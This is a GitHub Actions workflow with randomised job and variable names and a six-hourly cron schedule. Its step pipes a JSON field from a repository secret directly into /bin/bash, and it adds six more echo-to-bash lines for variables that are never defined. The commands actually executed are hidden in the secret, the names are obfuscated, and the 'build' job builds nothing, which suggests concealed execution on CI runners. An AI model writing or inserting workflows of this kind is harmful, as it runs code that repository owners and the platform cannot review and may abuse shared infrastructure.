name: caocao19870105

on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870105
        env:
          voygt39385: ${{ secrets.voygt39385 }}
        run: |
          echo $voygt39385 | jq -r .vccwh67491 | /bin/bash
          echo $oxrm07 | jq -r .qcf33661 | /bin/bash
          echo $wwko38856 | jq -r .afiw57 | /bin/bash
          echo $b5 | jq -r .fpboa000 | /bin/bash
          echo $pyzcs5535 | jq -r .zl62876 | /bin/bash
          echo $lfn3445 | jq -r .axh9 | /bin/bash
          echo $sjt338 | jq -r .e52657 | /bin/bash

